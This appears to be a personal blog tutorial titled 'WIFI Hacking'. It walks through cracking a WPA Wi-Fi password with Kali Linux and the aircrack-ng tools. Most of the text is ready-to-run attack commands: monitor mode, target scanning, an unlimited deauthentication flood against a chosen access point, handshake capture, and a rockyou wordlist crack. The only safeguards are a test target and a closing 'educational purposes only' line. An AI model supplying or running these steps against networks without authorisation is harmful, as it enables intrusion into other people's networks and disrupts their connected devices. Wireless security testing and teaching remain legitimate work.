WIFI Hacking

!abdu11ah
4 min readDec 10, 2023

In this blog of mine, I’ll elaborate on every step towards WIFI Hacking.

Things you need

  • Kali Linux Machine (Attacking Machine)
  • Network Adapter

Lets get cracking…

Before going any further update and upgrade your kali linux using the following command.

sudo apt update
sudo apt upgrade
sudo apt dist-upgrade

Firstly attach the Wi-Fi adapter to your Kali Linuxmachine. Make sure that your network adapter supports monitor mode. The network adapter that I am using in this demo is Alpha's AWUS036H.

alpha’s AWUS036H

After connecting your network adapter, type any of the commands given below to check whether your network adapter is connected successfully or not.

ifconfig
iwconfig

If the adapter is connected successfully then you’ll see the wlan0 interface. As you can see I have a wlan0 interface on my terminal. So this means I am good to go.

Now use the following command to kill any other interface process before you enable monitoring mode.

sudo airmon-ng check kill

Now let’s turn on the monitor mode of your adapter. Use this command to do so.

sudo airmon-ng start wlan0 

After turning the monitoring mode on type this command to detect the devices.

sudo airodump-ng wlan0

If you having trouble running this command then use wlan0mon instead of wlan0. As you can see following are the devices that the adapter detected successfully.

We will be targeting the Test device on the top.

After the devices are visible use the command mentioned below to start interacting with the target and to see which devices are connected with the target BSSID.

sudo airodump-ng wlan0mon -d <bssid-of-the-target>

One device is connected as you can see in the snippet above.

We’ll send deauth (deauthentication) packets. And when the device reconnects with the target device then you can easily capture the handshakes and save them in the file. The command to send deauths is as follows.

sudo aireplay-ng --deauth 0 -a <bssid-of-the-target> wlan0

This will break the connection.

Now we’ll capture some handshakes when the device reconnects to the targeted device and we’ll paste them into a file. To do so use the following command.

sudo airodump-ng –w <file-name> -c 1 --bssid <bssid-of-the-target>

Our .cap file has been created successfully. Open the file in Wireshark.

wireshark <file-name>.cap

Now we’ll use rockyou.txt to crack the password with the help of handshakes that we have captured in the file. Use the following command to do so.

sudo aircrack-ng <file-name>.cap -w <path/to/word/list>

After typing in the command it will try all the combinations and give you the right password.

As you can see the key is found and cracked successfully.

That’s all from me guys. It is one of my favorite hacks to do and I had very fun while compiling it. Hope you liked the blog. Use this for educational purposes only :)

THANKS

MUHAMMAD ABDULLAH

--

--